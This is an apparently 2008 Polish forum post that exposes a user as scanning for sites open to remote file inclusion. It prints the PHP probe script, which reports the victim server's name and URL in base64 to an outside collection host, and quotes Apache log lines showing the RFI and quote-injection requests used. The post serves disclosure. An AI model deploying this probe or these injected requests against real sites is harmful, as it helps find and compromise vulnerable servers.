Jestem właśnie po lekturze:
http://zetbete.bblog.pl/wpis,zrobiono;ze;mnie;hackera,8275.html
http://zetbete.bblog.pl/wpis,spowrotem;na;laczach,10858.html
Pozwolę sobie zatem dorzucić ku potomności 3 grosze w postaci skryptu typu
PHP injection: http://webp.szu.pl/tc.txt
<?php
file('http://www.zbt.mtvk.pl/hk/save.php?rfi=' .
base64_encode($_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']));
echo base64_decode('PFJlbW90ZUZpbGVJbmNsdXNpb24+');
?>
oraz logów apacza:
210.245.120.9 - - [05/Jul/2008:16:20:03
+0200] "GET /index.php?m=opl&pg_id=105' HTTP/1.0" 403
1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:18:14:07
+0200] "GET /index.php?m=page&pg_id=93' HTTP/1.0" 403
1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:23:15:38
+0200] "GET /index.php?m=http://www.webp.szu.pl/tc.txt?&pg_id=15
HTTP/1.0" 403 1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:23:15:39
+0200] "GET /index.php?m=page&pg_id=http://www.webp.szu.pl/tc.txt?
HTTP/1.0" 403 1050 "-" "-" "-" "-" "-"
Wynika stąd dość jednoznacznie, że dla użytkownik ZaBeaTy pierwszą rzeczą
jaką zrobił po odzyskaniu dostępu do klawiatury było odpalenie skryptu
poszukującego serwisów podatnych na RFI.
--
Pozdrawiam
Lemat
Reklamowanie tego lamusa tez chyba nie jest dobrym pomysłem :p